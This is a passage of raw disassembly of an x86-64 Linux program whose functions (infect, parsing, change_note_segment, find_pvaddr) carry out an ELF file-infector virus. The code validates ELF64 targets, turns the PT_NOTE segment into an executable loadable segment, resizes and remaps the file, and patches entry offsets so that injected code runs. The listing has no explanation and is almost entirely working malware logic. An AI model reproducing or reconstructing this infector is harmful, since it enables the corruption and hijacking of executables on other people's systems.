    1769:	e8 ba fd ff ff       	call   1528 <ft_memcpy>
    176e:	48 8b 95 00 ff ff ff 	mov    rdx,QWORD PTR [rbp-0x100]
    1775:	48 8b 85 78 fe ff ff 	mov    rax,QWORD PTR [rbp-0x188]
    177c:	48 8b 40 08          	mov    rax,QWORD PTR [rax+0x8]
    1780:	48 01 c2             	add    rdx,rax
    1783:	48 8b 85 c0 fe ff ff 	mov    rax,QWORD PTR [rbp-0x140]
    178a:	48 83 ea 45          	sub    rdx,0x45
    178e:	48 89 50 18          	mov    QWORD PTR [rax+0x18],rdx
    1792:	48 8b 85 c0 fe ff ff 	mov    rax,QWORD PTR [rbp-0x140]
    1799:	48 8d 48 18          	lea    rcx,[rax+0x18]
    179d:	41 b8 01 00 00 00    	mov    r8d,0x1
    17a3:	41 b9 04 00 00 00    	mov    r9d,0x4
    17a9:	41 ba 01 00 00 00    	mov    r10d,0x1
    17af:	4c 89 ca             	mov    rdx,r9
    17b2:	48 89 ce             	mov    rsi,rcx
    17b5:	4c 89 c7             	mov    rdi,r8
    17b8:	4c 89 d0             	mov    rax,r10
    17bb:	0f 05                	syscall
    17bd:	48 89 c1             	mov    rcx,rax
    17c0:	48 89 4d d0          	mov    QWORD PTR [rbp-0x30],rcx
    17c4:	48 8b 95 d8 fe ff ff 	mov    rdx,QWORD PTR [rbp-0x128]
    17cb:	48 8b 8d f8 fe ff ff 	mov    rcx,QWORD PTR [rbp-0x108]
    17d2:	48 8b 85 78 fe ff ff 	mov    rax,QWORD PTR [rbp-0x188]
    17d9:	48 8b 40 08          	mov    rax,QWORD PTR [rax+0x8]
    17dd:	48 01 c8             	add    rax,rcx
    17e0:	48 83 c0 20          	add    rax,0x20
    17e4:	48 8d 0c 02          	lea    rcx,[rdx+rax*1]
    17e8:	48 8d 85 90 fe ff ff 	lea    rax,[rbp-0x170]
    17ef:	ba 28 00 00 00       	mov    edx,0x28
    17f4:	48 89 c6             	mov    rsi,rax
    17f7:	48 89 cf             	mov    rdi,rcx
    17fa:	e8 29 fd ff ff       	call   1528 <ft_memcpy>
    17ff:	48 8b 85 10 ff ff ff 	mov    rax,QWORD PTR [rbp-0xf0]
    1806:	89 c2                	mov    edx,eax
    1808:	48 8b 85 00 ff ff ff 	mov    rax,QWORD PTR [rbp-0x100]
    180f:	89 c1                	mov    ecx,eax
    1811:	48 8b 85 78 fe ff ff 	mov    rax,QWORD PTR [rbp-0x188]
    1818:	48 8b 40 08          	mov    rax,QWORD PTR [rax+0x8]
    181c:	01 c8                	add    eax,ecx
    181e:	29 c2                	sub    edx,eax
    1820:	8d 42 0c             	lea    eax,[rdx+0xc]
    1823:	89 85 8c fe ff ff    	mov    DWORD PTR [rbp-0x174],eax
    1829:	48 8b 95 d8 fe ff ff 	mov    rdx,QWORD PTR [rbp-0x128]
    1830:	48 8b 8d f8 fe ff ff 	mov    rcx,QWORD PTR [rbp-0x108]
    1837:	48 8b 85 78 fe ff ff 	mov    rax,QWORD PTR [rbp-0x188]
    183e:	48 8b 40 08          	mov    rax,QWORD PTR [rax+0x8]
    1842:	48 01 c8             	add    rax,rcx
    1845:	48 83 e8 10          	sub    rax,0x10
    1849:	48 8d 0c 02          	lea    rcx,[rdx+rax*1]
    184d:	48 8d 85 8c fe ff ff 	lea    rax,[rbp-0x174]
    1854:	ba 04 00 00 00       	mov    edx,0x4
    1859:	48 89 c6             	mov    rsi,rax
    185c:	48 89 cf             	mov    rdi,rcx
    185f:	e8 c4 fc ff ff       	call   1528 <ft_memcpy>
    1864:	eb 04                	jmp    186a <infect+0x2ef>
    1866:	90                   	nop
    1867:	eb 01                	jmp    186a <infect+0x2ef>
    1869:	90                   	nop
    186a:	48 8b 95 d8 fe ff ff 	mov    rdx,QWORD PTR [rbp-0x128]
    1871:	48 8b 85 60 ff ff ff 	mov    rax,QWORD PTR [rbp-0xa0]
    1878:	48 89 c1             	mov    rcx,rax
    187b:	41 b8 0b 00 00 00    	mov    r8d,0xb
    1881:	48 89 ce             	mov    rsi,rcx
    1884:	48 89 d7             	mov    rdi,rdx
    1887:	4c 89 c0             	mov    rax,r8
    188a:	0f 05                	syscall
    188c:	48 89 c2             	mov    rdx,rax
    188f:	48 89 55 d0          	mov    QWORD PTR [rbp-0x30],rdx
    1893:	48 8b 55 d8          	mov    rdx,QWORD PTR [rbp-0x28]
    1897:	b9 03 00 00 00       	mov    ecx,0x3
    189c:	48 89 d7             	mov    rdi,rdx
    189f:	48 89 c8             	mov    rax,rcx
    18a2:	0f 05                	syscall
    18a4:	b8 00 00 00 00       	mov    eax,0x0
    18a9:	48 81 c4 70 01 00 00 	add    rsp,0x170
    18b0:	5b                   	pop    rbx
    18b1:	41 5c                	pop    r12
    18b3:	41 5d                	pop    r13
    18b5:	41 5e                	pop    r14
    18b7:	5d                   	pop    rbp
    18b8:	c3                   	ret

00000000000018b9 <parsing>:
    18b9:	55                   	push   rbp
    18ba:	48 89 e5             	mov    rbp,rsp
    18bd:	48 89 7d e8          	mov    QWORD PTR [rbp-0x18],rdi
    18c1:	48 89 75 e0          	mov    QWORD PTR [rbp-0x20],rsi
    18c5:	48 c7 45 f0 00 00 00 	mov    QWORD PTR [rbp-0x10],0x0
    18cc:	00 
    18cd:	48 8b 45 e8          	mov    rax,QWORD PTR [rbp-0x18]
    18d1:	8b 00                	mov    eax,DWORD PTR [rax]
    18d3:	3d 7f 45 4c 46       	cmp    eax,0x464c457f
    18d8:	74 0a                	je     18e4 <parsing+0x2b>
    18da:	b8 00 00 00 00       	mov    eax,0x0
    18df:	e9 18 01 00 00       	jmp    19fc <parsing+0x143>
    18e4:	48 8b 45 e8          	mov    rax,QWORD PTR [rbp-0x18]
    18e8:	48 83 c0 04          	add    rax,0x4
    18ec:	0f b6 00             	movzx  eax,BYTE PTR [rax]
    18ef:	3c 02                	cmp    al,0x2
    18f1:	75 0f                	jne    1902 <parsing+0x49>
    18f3:	48 8b 45 e8          	mov    rax,QWORD PTR [rbp-0x18]
    18f7:	48 83 c0 05          	add    rax,0x5
    18fb:	0f b6 00             	movzx  eax,BYTE PTR [rax]
    18fe:	3c 01                	cmp    al,0x1
    1900:	74 0a                	je     190c <parsing+0x53>
    1902:	b8 00 00 00 00       	mov    eax,0x0
    1907:	e9 f0 00 00 00       	jmp    19fc <parsing+0x143>
    190c:	48 8b 45 e8          	mov    rax,QWORD PTR [rbp-0x18]
    1910:	0f b7 40 12          	movzx  eax,WORD PTR [rax+0x12]
    1914:	66 83 f8 3e          	cmp    ax,0x3e
    1918:	75 1c                	jne    1936 <parsing+0x7d>
    191a:	48 8b 45 e8          	mov    rax,QWORD PTR [rbp-0x18]
    191e:	0f b7 40 10          	movzx  eax,WORD PTR [rax+0x10]
    1922:	66 83 f8 02          	cmp    ax,0x2
    1926:	74 18                	je     1940 <parsing+0x87>
    1928:	48 8b 45 e8          	mov    rax,QWORD PTR [rbp-0x18]
    192c:	0f b7 40 10          	movzx  eax,WORD PTR [rax+0x10]
    1930:	66 83 f8 03          	cmp    ax,0x3
    1934:	74 0a                	je     1940 <parsing+0x87>
    1936:	b8 00 00 00 00       	mov    eax,0x0
    193b:	e9 bc 00 00 00       	jmp    19fc <parsing+0x143>
    1940:	48 8b 45 e0          	mov    rax,QWORD PTR [rbp-0x20]
    1944:	48 8b 55 e8          	mov    rdx,QWORD PTR [rbp-0x18]
    1948:	48 89 50 18          	mov    QWORD PTR [rax+0x18],rdx
    194c:	48 8b 45 e0          	mov    rax,QWORD PTR [rbp-0x20]
    1950:	48 8b 55 e8          	mov    rdx,QWORD PTR [rbp-0x18]
    1954:	48 89 10             	mov    QWORD PTR [rax],rdx
    1957:	48 8b 45 e0          	mov    rax,QWORD PTR [rbp-0x20]
    195b:	48 8b 00             	mov    rax,QWORD PTR [rax]
    195e:	48 8b 50 28          	mov    rdx,QWORD PTR [rax+0x28]
    1962:	48 8b 45 e8          	mov    rax,QWORD PTR [rbp-0x18]
    1966:	48 01 c2             	add    rdx,rax
    1969:	48 8b 45 e0          	mov    rax,QWORD PTR [rbp-0x20]
    196d:	48 89 50 08          	mov    QWORD PTR [rax+0x8],rdx
    1971:	48 8b 45 e0          	mov    rax,QWORD PTR [rbp-0x20]
    1975:	48 8b 00             	mov    rax,QWORD PTR [rax]
    1978:	48 8b 50 20          	mov    rdx,QWORD PTR [rax+0x20]
    197c:	48 8b 45 e8          	mov    rax,QWORD PTR [rbp-0x18]
    1980:	48 01 c2             	add    rdx,rax
    1983:	48 8b 45 e0          	mov    rax,QWORD PTR [rbp-0x20]
    1987:	48 89 50 10          	mov    QWORD PTR [rax+0x10],rdx
    198b:	48 8b 45 e0          	mov    rax,QWORD PTR [rbp-0x20]
    198f:	48 8b 00             	mov    rax,QWORD PTR [rax]
    1992:	48 8b 50 18          	mov    rdx,QWORD PTR [rax+0x18]
    1996:	48 8b 45 e0          	mov    rax,QWORD PTR [rbp-0x20]
    199a:	48 89 50 50          	mov    QWORD PTR [rax+0x50],rdx
    199e:	48 c7 45 f8 00 00 00 	mov    QWORD PTR [rbp-0x8],0x0
    19a5:	00 
    19a6:	eb 3b                	jmp    19e3 <parsing+0x12a>
    19a8:	48 8b 45 e0          	mov    rax,QWORD PTR [rbp-0x20]
    19ac:	48 8b 48 10          	mov    rcx,QWORD PTR [rax+0x10]
    19b0:	48 8b 55 f8          	mov    rdx,QWORD PTR [rbp-0x8]
    19b4:	48 89 d0             	mov    rax,rdx
    19b7:	48 c1 e0 03          	shl    rax,0x3
    19bb:	48 29 d0             	sub    rax,rdx
    19be:	48 c1 e0 03          	shl    rax,0x3
    19c2:	48 01 c8             	add    rax,rcx
    19c5:	48 89 45 f0          	mov    QWORD PTR [rbp-0x10],rax
    19c9:	48 8b 45 f0          	mov    rax,QWORD PTR [rbp-0x10]
    19cd:	8b 40 04             	mov    eax,DWORD PTR [rax+0x4]
    19d0:	83 e0 10             	and    eax,0x10
    19d3:	85 c0                	test   eax,eax
    19d5:	74 07                	je     19de <parsing+0x125>
    19d7:	b8 00 00 00 00       	mov    eax,0x0
    19dc:	eb 1e                	jmp    19fc <parsing+0x143>
    19de:	48 83 45 f8 01       	add    QWORD PTR [rbp-0x8],0x1
    19e3:	48 8b 45 e0          	mov    rax,QWORD PTR [rbp-0x20]
    19e7:	48 8b 00             	mov    rax,QWORD PTR [rax]
    19ea:	0f b7 40 38          	movzx  eax,WORD PTR [rax+0x38]
    19ee:	0f b7 c0             	movzx  eax,ax
    19f1:	48 39 45 f8          	cmp    QWORD PTR [rbp-0x8],rax
    19f5:	72 b1                	jb     19a8 <parsing+0xef>
    19f7:	b8 01 00 00 00       	mov    eax,0x1
    19fc:	5d                   	pop    rbp
    19fd:	c3                   	ret

00000000000019fe <change_note_segment>:
    19fe:	55                   	push   rbp
    19ff:	48 89 e5             	mov    rbp,rsp
    1a02:	53                   	push   rbx
    1a03:	48 83 ec 58          	sub    rsp,0x58
    1a07:	48 89 7d a8          	mov    QWORD PTR [rbp-0x58],rdi
    1a0b:	48 89 75 a0          	mov    QWORD PTR [rbp-0x60],rsi
    1a0f:	48 c7 45 e8 00 00 00 	mov    QWORD PTR [rbp-0x18],0x0
    1a16:	00 
    1a17:	48 c7 45 d0 00 00 00 	mov    QWORD PTR [rbp-0x30],0x0
    1a1e:	00 
    1a1f:	48 c7 45 e0 00 00 00 	mov    QWORD PTR [rbp-0x20],0x0
    1a26:	00 
    1a27:	48 c7 45 c8 00 00 00 	mov    QWORD PTR [rbp-0x38],0x0
    1a2e:	00 
    1a2f:	48 c7 45 d8 00 00 00 	mov    QWORD PTR [rbp-0x28],0x0
    1a36:	00 
    1a37:	eb 3b                	jmp    1a74 <change_note_segment+0x76>
    1a39:	48 8b 45 a0          	mov    rax,QWORD PTR [rbp-0x60]
    1a3d:	48 8b 48 10          	mov    rcx,QWORD PTR [rax+0x10]
    1a41:	48 8b 55 d8          	mov    rdx,QWORD PTR [rbp-0x28]
    1a45:	48 89 d0             	mov    rax,rdx
    1a48:	48 c1 e0 03          	shl    rax,0x3
    1a4c:	48 29 d0             	sub    rax,rdx
    1a4f:	48 c1 e0 03          	shl    rax,0x3
    1a53:	48 01 c8             	add    rax,rcx
    1a56:	48 89 45 e0          	mov    QWORD PTR [rbp-0x20],rax
    1a5a:	48 8b 45 e0          	mov    rax,QWORD PTR [rbp-0x20]
    1a5e:	8b 00                	mov    eax,DWORD PTR [rax]
    1a60:	83 f8 04             	cmp    eax,0x4
    1a63:	75 0a                	jne    1a6f <change_note_segment+0x71>
    1a65:	48 8b 45 d8          	mov    rax,QWORD PTR [rbp-0x28]
    1a69:	48 89 45 e8          	mov    QWORD PTR [rbp-0x18],rax
    1a6d:	eb 19                	jmp    1a88 <change_note_segment+0x8a>
    1a6f:	48 83 45 d8 01       	add    QWORD PTR [rbp-0x28],0x1
    1a74:	48 8b 45 a0          	mov    rax,QWORD PTR [rbp-0x60]
    1a78:	48 8b 00             	mov    rax,QWORD PTR [rax]
    1a7b:	0f b7 40 38          	movzx  eax,WORD PTR [rax+0x38]
    1a7f:	0f b7 c0             	movzx  eax,ax
    1a82:	48 39 45 d8          	cmp    QWORD PTR [rbp-0x28],rax
    1a86:	72 b1                	jb     1a39 <change_note_segment+0x3b>
    1a88:	48 8b 45 e0          	mov    rax,QWORD PTR [rbp-0x20]
    1a8c:	48 8b 40 20          	mov    rax,QWORD PTR [rax+0x20]
    1a90:	48 89 45 c0          	mov    QWORD PTR [rbp-0x40],rax
    1a94:	48 8b 45 e0          	mov    rax,QWORD PTR [rbp-0x20]
    1a98:	48 8b 50 20          	mov    rdx,QWORD PTR [rax+0x20]
    1a9c:	48 8b 45 a8          	mov    rax,QWORD PTR [rbp-0x58]
    1aa0:	48 8b 40 08          	mov    rax,QWORD PTR [rax+0x8]
    1aa4:	48 01 d0             	add    rax,rdx
    1aa7:	48 83 c0 48          	add    rax,0x48
    1aab:	48 89 45 b8          	mov    QWORD PTR [rbp-0x48],rax
    1aaf:	48 8b 45 b8          	mov    rax,QWORD PTR [rbp-0x48]
    1ab3:	48 25 00 f0 ff ff    	and    rax,0xfffffffffffff000
    1ab9:	48 05 00 10 00 00    	add    rax,0x1000
    1abf:	48 89 45 b8          	mov    QWORD PTR [rbp-0x48],rax
    1ac3:	48 8b 45 a0          	mov    rax,QWORD PTR [rbp-0x60]
    1ac7:	48 8b 40 20          	mov    rax,QWORD PTR [rax+0x20]
    1acb:	48 89 c1             	mov    rcx,rax
    1ace:	48 8b 45 a0          	mov    rax,QWORD PTR [rbp-0x60]
    1ad2:	48 8b 50 58          	mov    rdx,QWORD PTR [rax+0x58]
    1ad6:	48 8b 45 b8          	mov    rax,QWORD PTR [rbp-0x48]
    1ada:	48 01 c2             	add    rdx,rax
    1add:	48 8b 45 a0          	mov    rax,QWORD PTR [rbp-0x60]
    1ae1:	48 8b 40 58          	mov    rax,QWORD PTR [rax+0x58]
    1ae5:	25 ff 0f 00 00       	and    eax,0xfff
    1aea:	48 29 c2             	sub    rdx,rax
    1aed:	48 81 c2 00 10 00 00 	add    rdx,0x1000
    1af4:	41 b8 4d 00 00 00    	mov    r8d,0x4d
    1afa:	48 89 d6             	mov    rsi,rdx
    1afd:	48 89 cf             	mov    rdi,rcx
    1b00:	4c 89 c0             	mov    rax,r8
    1b03:	0f 05                	syscall
    1b05:	48 89 c2             	mov    rdx,rax
    1b08:	48 89 55 d0          	mov    QWORD PTR [rbp-0x30],rdx
    1b0c:	48 83 7d d0 00       	cmp    QWORD PTR [rbp-0x30],0x0
    1b11:	79 0a                	jns    1b1d <change_note_segment+0x11f>
    1b13:	b8 01 00 00 00       	mov    eax,0x1
    1b18:	e9 ea 01 00 00       	jmp    1d07 <change_note_segment+0x309>
    1b1d:	48 8b 45 a0          	mov    rax,QWORD PTR [rbp-0x60]
    1b21:	48 8b 48 18          	mov    rcx,QWORD PTR [rax+0x18]
    1b25:	48 8b 45 a0          	mov    rax,QWORD PTR [rbp-0x60]
    1b29:	4c 8b 40 58          	mov    r8,QWORD PTR [rax+0x58]
    1b2d:	48 8b 45 a0          	mov    rax,QWORD PTR [rbp-0x60]
    1b31:	48 8b 50 58          	mov    rdx,QWORD PTR [rax+0x58]
    1b35:	48 8b 45 b8          	mov    rax,QWORD PTR [rbp-0x48]
    1b39:	48 01 c2             	add    rdx,rax
    1b3c:	48 8b 45 a0          	mov    rax,QWORD PTR [rbp-0x60]
    1b40:	48 8b 40 58          	mov    rax,QWORD PTR [rax+0x58]
    1b44:	25 ff 0f 00 00       	and    eax,0xfff
    1b49:	48 29 c2             	sub    rdx,rax
    1b4c:	4c 8d 8a 00 10 00 00 	lea    r9,[rdx+0x1000]
    1b53:	41 bb 01 00 00 00    	mov    r11d,0x1
    1b59:	bb 19 00 00 00       	mov    ebx,0x19
    1b5e:	4d 89 da             	mov    r10,r11
    1b61:	4c 89 ca             	mov    rdx,r9
    1b64:	4c 89 c6             	mov    rsi,r8
    1b67:	48 89 cf             	mov    rdi,rcx
    1b6a:	48 89 d8             	mov    rax,rbx
    1b6d:	0f 05                	syscall
    1b6f:	48 89 c1             	mov    rcx,rax
    1b72:	48 89 4d d0          	mov    QWORD PTR [rbp-0x30],rcx
    1b76:	48 83 7d d0 ea       	cmp    QWORD PTR [rbp-0x30],0xffffffffffffffea
    1b7b:	7c 11                	jl     1b8e <change_note_segment+0x190>
    1b7d:	48 83 7d d0 00       	cmp    QWORD PTR [rbp-0x30],0x0
    1b82:	79 0a                	jns    1b8e <change_note_segment+0x190>
    1b84:	b8 01 00 00 00       	mov    eax,0x1
    1b89:	e9 79 01 00 00       	jmp    1d07 <change_note_segment+0x309>
    1b8e:	48 8b 55 d0          	mov    rdx,QWORD PTR [rbp-0x30]
    1b92:	48 8b 45 a0          	mov    rax,QWORD PTR [rbp-0x60]
    1b96:	48 89 50 18          	mov    QWORD PTR [rax+0x18],rdx
    1b9a:	48 8b 45 a0          	mov    rax,QWORD PTR [rbp-0x60]
    1b9e:	48 8b 50 18          	mov    rdx,QWORD PTR [rax+0x18]
    1ba2:	48 8b 45 a0          	mov    rax,QWORD PTR [rbp-0x60]
    1ba6:	48 89 10             	mov    QWORD PTR [rax],rdx
    1ba9:	48 8b 45 a0          	mov    rax,QWORD PTR [rbp-0x60]
    1bad:	48 8b 50 18          	mov    rdx,QWORD PTR [rax+0x18]
    1bb1:	48 8b 45 a0          	mov    rax,QWORD PTR [rbp-0x60]
    1bb5:	48 8b 00             	mov    rax,QWORD PTR [rax]
    1bb8:	48 8b 40 28          	mov    rax,QWORD PTR [rax+0x28]
    1bbc:	48 01 c2             	add    rdx,rax
    1bbf:	48 8b 45 a0          	mov    rax,QWORD PTR [rbp-0x60]
    1bc3:	48 89 50 08          	mov    QWORD PTR [rax+0x8],rdx
    1bc7:	48 8b 45 a0          	mov    rax,QWORD PTR [rbp-0x60]
    1bcb:	48 8b 50 18          	mov    rdx,QWORD PTR [rax+0x18]
    1bcf:	48 8b 45 a0          	mov    rax,QWORD PTR [rbp-0x60]
    1bd3:	48 8b 00             	mov    rax,QWORD PTR [rax]
    1bd6:	48 8b 40 20          	mov    rax,QWORD PTR [rax+0x20]
    1bda:	48 01 c2             	add    rdx,rax
    1bdd:	48 8b 45 a0          	mov    rax,QWORD PTR [rbp-0x60]
    1be1:	48 89 50 10          	mov    QWORD PTR [rax+0x10],rdx
    1be5:	48 8b 45 a0          	mov    rax,QWORD PTR [rbp-0x60]
    1be9:	48 8b 48 10          	mov    rcx,QWORD PTR [rax+0x10]
    1bed:	48 8b 55 e8          	mov    rdx,QWORD PTR [rbp-0x18]
    1bf1:	48 89 d0             	mov    rax,rdx
    1bf4:	48 c1 e0 03          	shl    rax,0x3
    1bf8:	48 29 d0             	sub    rax,rdx
    1bfb:	48 c1 e0 03          	shl    rax,0x3
    1bff:	48 01 c8             	add    rax,rcx
    1c02:	48 89 45 e0          	mov    QWORD PTR [rbp-0x20],rax
    1c06:	48 8b 45 a0          	mov    rax,QWORD PTR [rbp-0x60]
    1c0a:	48 89 c7             	mov    rdi,rax
    1c0d:	e8 8f 02 00 00       	call   1ea1 <exec_segment>
    1c12:	48 89 45 c8          	mov    QWORD PTR [rbp-0x38],rax
    1c16:	48 8b 55 b8          	mov    rdx,QWORD PTR [rbp-0x48]
    1c1a:	48 8b 4d e0          	mov    rcx,QWORD PTR [rbp-0x20]
    1c1e:	48 8b 45 a0          	mov    rax,QWORD PTR [rbp-0x60]
    1c22:	48 89 ce             	mov    rsi,rcx
    1c25:	48 89 c7             	mov    rdi,rax
    1c28:	e8 e0 00 00 00       	call   1d0d <find_pvaddr>
    1c2d:	84 c0                	test   al,al
    1c2f:	74 0a                	je     1c3b <change_note_segment+0x23d>
    1c31:	b8 01 00 00 00       	mov    eax,0x1
    1c36:	e9 cc 00 00 00       	jmp    1d07 <change_note_segment+0x309>
    1c3b:	48 8b 45 e0          	mov    rax,QWORD PTR [rbp-0x20]
    1c3f:	c7 00 01 00 00 00    	mov    DWORD PTR [rax],0x1
    1c45:	48 8b 45 e0          	mov    rax,QWORD PTR [rbp-0x20]
    1c49:	c7 40 04 15 00 00 00 	mov    DWORD PTR [rax+0x4],0x15
    1c50:	48 8b 45 e0          	mov    rax,QWORD PTR [rbp-0x20]
    1c54:	48 8b 50 20          	mov    rdx,QWORD PTR [rax+0x20]
    1c58:	48 8b 45 a8          	mov    rax,QWORD PTR [rbp-0x58]
    1c5c:	48 8b 40 08          	mov    rax,QWORD PTR [rax+0x8]
    1c60:	48 01 d0             	add    rax,rdx
    1c63:	48 8d 50 48          	lea    rdx,[rax+0x48]
    1c67:	48 8b 45 e0          	mov    rax,QWORD PTR [rbp-0x20]
    1c6b:	48 89 50 20          	mov    QWORD PTR [rax+0x20],rdx
    1c6f:	48 8b 45 e0          	mov    rax,QWORD PTR [rbp-0x20]
    1c73:	48 8b 50 20          	mov    rdx,QWORD PTR [rax+0x20]
    1c77:	48 8b 45 e0          	mov    rax,QWORD PTR [rbp-0x20]
    1c7b:	48 89 50 28          	mov    QWORD PTR [rax+0x28],rdx
    1c7f:	48 8b 45 a0          	mov    rax,QWORD PTR [rbp-0x60]
    1c83:	48 8b 40 58          	mov    rax,QWORD PTR [rax+0x58]
    1c87:	48 25 00 f0 ff ff    	and    rax,0xfffffffffffff000
    1c8d:	48 8d 90 00 10 00 00 	lea    rdx,[rax+0x1000]
    1c94:	48 8b 45 e0          	mov    rax,QWORD PTR [rbp-0x20]
    1c98:	48 89 50 08          	mov    QWORD PTR [rax+0x8],rdx
    1c9c:	48 8b 45 c8          	mov    rax,QWORD PTR [rbp-0x38]
    1ca0:	48 8b 50 30          	mov    rdx,QWORD PTR [rax+0x30]
    1ca4:	48 8b 45 e0          	mov    rax,QWORD PTR [rbp-0x20]
    1ca8:	48 89 50 30          	mov    QWORD PTR [rax+0x30],rdx
    1cac:	48 8b 45 e0          	mov    rax,QWORD PTR [rbp-0x20]
    1cb0:	48 8b 50 08          	mov    rdx,QWORD PTR [rax+0x8]
    1cb4:	48 8b 45 c0          	mov    rax,QWORD PTR [rbp-0x40]
    1cb8:	48 01 c2             	add    rdx,rax
    1cbb:	48 8b 45 a0          	mov    rax,QWORD PTR [rbp-0x60]
    1cbf:	48 89 50 38          	mov    QWORD PTR [rax+0x38],rdx
    1cc3:	48 8b 45 e0          	mov    rax,QWORD PTR [rbp-0x20]
    1cc7:	48 8b 50 10          	mov    rdx,QWORD PTR [rax+0x10]
    1ccb:	48 8b 45 c0          	mov    rax,QWORD PTR [rbp-0x40]
    1ccf:	48 01 c2             	add    rdx,rax
    1cd2:	48 8b 45 a0          	mov    rax,QWORD PTR [rbp-0x60]
    1cd6:	48 89 50 40          	mov    QWORD PTR [rax+0x40],rdx
    1cda:	48 8b 45 a0          	mov    rax,QWORD PTR [rbp-0x60]
    1cde:	48 8b 40 38          	mov    rax,QWORD PTR [rax+0x38]
    1ce2:	48 8d 50 20          	lea    rdx,[rax+0x20]
    1ce6:	48 8b 45 a0          	mov    rax,QWORD PTR [rbp-0x60]
    1cea:	48 89 50 28          	mov    QWORD PTR [rax+0x28],rdx
    1cee:	48 8b 45 a0          	mov    rax,QWORD PTR [rbp-0x60]
    1cf2:	48 8b 40 40          	mov    rax,QWORD PTR [rax+0x40]
    1cf6:	48 8d 50 20          	lea    rdx,[rax+0x20]
    1cfa:	48 8b 45 a0          	mov    rax,QWORD PTR [rbp-0x60]
    1cfe:	48 89 50 30          	mov    QWORD PTR [rax+0x30],rdx
    1d02:	b8 00 00 00 00       	mov    eax,0x0
    1d07:	48 8b 5d f8          	mov    rbx,QWORD PTR [rbp-0x8]
    1d0b:	c9                   	leave
    1d0c:	c3                   	ret

0000000000001d0d <find_pvaddr>:
    1d0d:	55                   	push   rbp
    1d0e:	48 89 e5             	mov    rbp,rsp
    1d11:	48 89 7d c8          	mov    QWORD PTR [rbp-0x38],rdi
    1d15:	48 89 75 c0          	mov    QWORD PTR [rbp-0x40],rsi
    1d19:	48 89 55 b8          	mov    QWORD PTR [rbp-0x48],rdx
    1d1d:	48 c7 45 e0 00 00 00 	mov    QWORD PTR [rbp-0x20],0x0
    1d24:	00 
    1d25:	48 c7 45 f8 00 00 00 	mov    QWORD PTR [rbp-0x8],0x0
    1d2c:	00 
    1d2d:	48 c7 45 f0 00 00 00 	mov    QWORD PTR [rbp-0x10],0x0
    1d34:	00 
    1d35:	48 c7 45 d8 00 00 00 	mov    QWORD PTR [rbp-0x28],0x0
    1d3c:	00 
    1d3d:	48 c7 45 e8 00 00 00 	mov    QWORD PTR [rbp-0x18],0x0
    1d44:	00 
    1d45:	e9 b8 00 00 00       	jmp    1e02 <find_pvaddr+0xf5>
    1d4a:	48 8b 45 c8          	mov    rax,QWORD PTR [rbp-0x38]
    1d4e:	48 8b 48 10          	mov    rcx,QWORD PTR [rax+0x10]
    1d52:	48 8b 55 e8          	mov    rdx,QWORD PTR [rbp-0x18]
    1d56:	48 89 d0             	mov    rax,rdx
    1d59:	48 c1 e0 03          	shl    rax,0x3
    1d5d:	48 29 d0             	sub    rax,rdx
    1d60:	48 c1 e0 03          	shl    rax,0x3
    1d64:	48 01 c8             	add    rax,rcx
    1d67:	48 89 45 e0          	mov    QWORD PTR [rbp-0x20],rax
    1d6b:	48 8b 45 e0          	mov    rax,QWORD PTR [rbp-0x20]
    1d6f:	48 8b 48 10          	mov    rcx,QWORD PTR [rax+0x10]
    1d73:	48 8b 45 e0          	mov    rax,QWORD PTR [rbp-0x20]
    1d77:	48 8b 40 20          	mov    rax,QWORD PTR [rax+0x20]
    1d7b:	48 8b 55 e0          	mov    rdx,QWORD PTR [rbp-0x20]
    1d7f:	48 8b 72 30          	mov    rsi,QWORD PTR [rdx+0x30]
    1d83:	ba 00 00 00 00       	mov    edx,0x0
    1d88:	48 f7 f6             	div    rsi
    1d8b:	48 8d 50 01          	lea    rdx,[rax+0x1]
    1d8f:	48 8b 45 e0          	mov    rax,QWORD PTR [rbp-0x20]
    1d93:	48 8b 40 30          	mov    rax,QWORD PTR [rax+0x30]
    1d97:	48 0f af c2          	imul   rax,rdx
    1d9b:	48 01 c8             	add    rax,rcx
    1d9e:	48 89 45 d8          	mov    QWORD PTR [rbp-0x28],rax
    1da2:	48 8b 45 d8          	mov    rax,QWORD PTR [rbp-0x28]
    1da6:	48 39 45 f8          	cmp    QWORD PTR [rbp-0x8],rax
    1daa:	73 08                	jae    1db4 <find_pvaddr+0xa7>
    1dac:	48 8b 45 d8          	mov    rax,QWORD PTR [rbp-0x28]
    1db0:	48 89 45 f8          	mov    QWORD PTR [rbp-0x8],rax
    1db4:	48 8b 45 e0          	mov    rax,QWORD PTR [rbp-0x20]
    1db8:	48 8b 48 18          	mov    rcx,QWORD PTR [rax+0x18]
    1dbc:	48 8b 45 e0          	mov    rax,QWORD PTR [rbp-0x20]
    1dc0:	48 8b 40 20          	mov    rax,QWORD PTR [rax+0x20]
    1dc4:	48 8b 55 e0          	mov    rdx,QWORD PTR [rbp-0x20]
    1dc8:	48 8b 7a 30          	mov    rdi,QWORD PTR [rdx+0x30]
    1dcc:	ba 00 00 00 00       	mov    edx,0x0
    1dd1:	48 f7 f7             	div    rdi
    1dd4:	48 8d 50 01          	lea    rdx,[rax+0x1]
    1dd8:	48 8b 45 e0          	mov    rax,QWORD PTR [rbp-0x20]
    1ddc:	48 8b 40 30          	mov    rax,QWORD PTR [rax+0x30]
    1de0:	48 0f af c2          	imul   rax,rdx
    1de4:	48 01 c8             	add    rax,rcx
    1de7:	48 89 45 d8          	mov    QWORD PTR [rbp-0x28],rax
    1deb:	48 8b 45 d8          	mov    rax,QWORD PTR [rbp-0x28]
    1def:	48 39 45 f0          	cmp    QWORD PTR [rbp-0x10],rax
    1df3:	73 08                	jae    1dfd <find_pvaddr+0xf0>
    1df5:	48 8b 45 d8          	mov    rax,QWORD PTR [rbp-0x28]
    1df9:	48 89 45 f0          	mov    QWORD PTR [rbp-0x10],rax
    1dfd:	48 83 45 e8 01       	add    QWORD PTR [rbp-0x18],0x1
    1e02:	48 8b 45 c8          	mov    rax,QWORD PTR [rbp-0x38]
    1e06:	48 8b 00             	mov    rax,QWORD PTR [rax]
    1e09:	0f b7 40 38          	movzx  eax,WORD PTR [rax+0x38]
    1e0d:	0f b7 c0             	movzx  eax,ax
    1e10:	48 39 45 e8          	cmp    QWORD PTR [rbp-0x18],rax
    1e14:	0f 82 30 ff ff ff    	jb     1d4a <find_pvaddr+0x3d>
    1e1a:	48 8b 45 f8          	mov    rax,QWORD PTR [rbp-0x8]
    1e1e:	48 c1 e8 0c          	shr    rax,0xc
    1e22:	48 83 c0 01          	add    rax,0x1
    1e26:	48 c1 e0 0c          	shl    rax,0xc
